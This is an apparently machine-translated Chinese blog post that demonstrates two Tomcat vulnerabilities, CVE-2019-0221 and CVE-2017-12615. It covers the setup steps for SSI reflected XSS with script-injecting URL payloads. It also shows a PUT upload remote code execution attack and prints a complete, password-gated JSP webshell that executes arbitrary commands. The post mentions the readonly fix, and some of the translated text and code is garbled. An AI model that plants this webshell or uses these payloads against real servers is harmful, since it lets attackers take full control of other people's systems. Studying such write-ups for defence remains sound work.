two
Simulate the entire vulnerability attack process, why the vulnerability arises, and how the Tomcat gods respond.

[Attack 1: XSS attack]

One, SSI technical description

The first vulnerability demonstrated is related to Tomcat’s SSI functionality. What is SSI

SSI technology, also known as Serve Side Includes, SSI (Server Side Includes) are instructions placed in HTML pages and evaluated on the server as the page is served. They allow you to add dynamically generated content to an existing HTML page without having to serve the entire page through CGI programs or other dynamic techniques. Use the default suffix.shtml for SSI technical files.

For example, we can place directives into existing HTML pages, for example:

! --#echo var="DATE_LOCAL" -->
Copy the code

When the page is executed, the following results are displayed

Sunday, 22-March-2020 18:28:54 GMT
Copy the code

One of the most common uses of SSI is to print the results of CGI programs, such as hit counters. About more details see the technology: httpd.apache.org/docs/curren…

2. Enable SSI for Tomcat

1. To prepare the JRE and Tomcat environment, I selected “apache-tomcat-9.0.10”. Apache Tomcat 9.0.0.m1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93)
2. Modify line 19 of conf/context.xml to enable permissions

<Context privileged="true">
Copy the code

3. Modify conf\web. XML to enable SSI Servlet. This section of code is commented out by default, we can delete the comment, the code is 310-322 lines.

<servlet>
        <servlet-name>ssi</servlet-name>
        <servlet-class>
          org.apache.catalina.ssi.SSIServlet
        </servlet-class>
        <init-param>
          <param-name>buffered</param-name>
          <param-value>1</param-value>
        </init-param>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>expires</param-name>
          <param-value>666</param-value>
        </init-param>
        <init-param>
          <param-name>isVirtualWebappRelative</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>4</load-on-startup>
    </servlet>
Copy the code

Remove lines 422-425 about THE SSI configuration

  <servlet-mapping>
        <servlet-name>ssi</servlet-name>
        <url-pattern>*.shtml</url-pattern>
    </servlet-mapping>
Copy the code

4. Add the madashu_env.shtml (habitually named printenv.shtml) file to the ROOT directory, located in webapps /root/ssi /

<html><head><title></title><body> Echo: <! --#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <! --#printenv -->
</body></html>
Copy the code

5. Start Tomcat

Three, launch an attack

1. Let’s enter the following URL to see what it looks like

http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94 %E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3ECopy the code

http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%8 8%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3ECopy the code

If the attack succeeds, the following page is displayed.

4. Source code analysis

Tomcat quickly fixed the bug after it was created, and we found the code fix submission record on Github: Click Commit

This is what SAO operation!! Entity!!

org.apache.catalina.ssi. SSIMediator

SSIPrintenv.java

Threat 2: Remote Code Execution

Next, I will briefly demonstrate the remote code execution vulnerability, which is a high-risk vulnerability. Even if it is not the default configuration, once the vulnerability exists, the attacker can successfully upload Webshell and control the server.

1. Upload files using PUT and intercept requests in progress:
   

   

2. Generate a malicious file and name itjiansheng.jsp
   

   

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"% > < %! public static String excuteCmd(String c) {StringBuilder line = new StringBuilder(); try {Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null;while((temp = buf.readLine()) ! = null) {line.append(temp +"\\n"); }buf.close(); } catch (Exception e) {line.append(e.getMessage()); }returnline.toString(); } % > < %if("023".equals(request.getParameter("pwd")) &&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) +"</pre>"); }else{out.println(": -)"); } % >Copy the code

3. The remote upload was successful, and now we can happily play in the Tomcat that is not our own
   

   

4. The whole code is relatively simple and can be looked atJspServlet.javaI’m not going to do the demo here. ** This vulnerability affects a very wide range, from 5.x to 9.x all shot. The best solution is to set readonly to true for DefaultServlet in conf/web.xml.

---

[Conclusion] Interest is the best teacher. We can improve ourselves more quickly standing on the shoulders of giants by seeing the pits and codes that big men have fallen off. Interested friends can look at the Tomcat has reported: tomcat.apache.org/security-9…. The two vulnerabilities in this demo are CVE-2019-0221 and CVE-2017-12615.

Thank you for your attention to the public number “code uncle”, or pay attention to my personal micro signal: QiaoJS (nickname: Jiansheng, remarks nuggets) we work together Java related exchange learning!

Wechat public number: code uncle ten years rong “code”, old “uncle” bloom

Phase to recommend

AI Learning Notes: Feature engineering

From tens of millions of data query to talk about the index structure and database principle

An Overview of Artificial Intelligence and machine Learning

The most powerful Java in-heap caching framework in history

SpringCloud Second Generation Field series (I) : Service registration and discovery using Nacos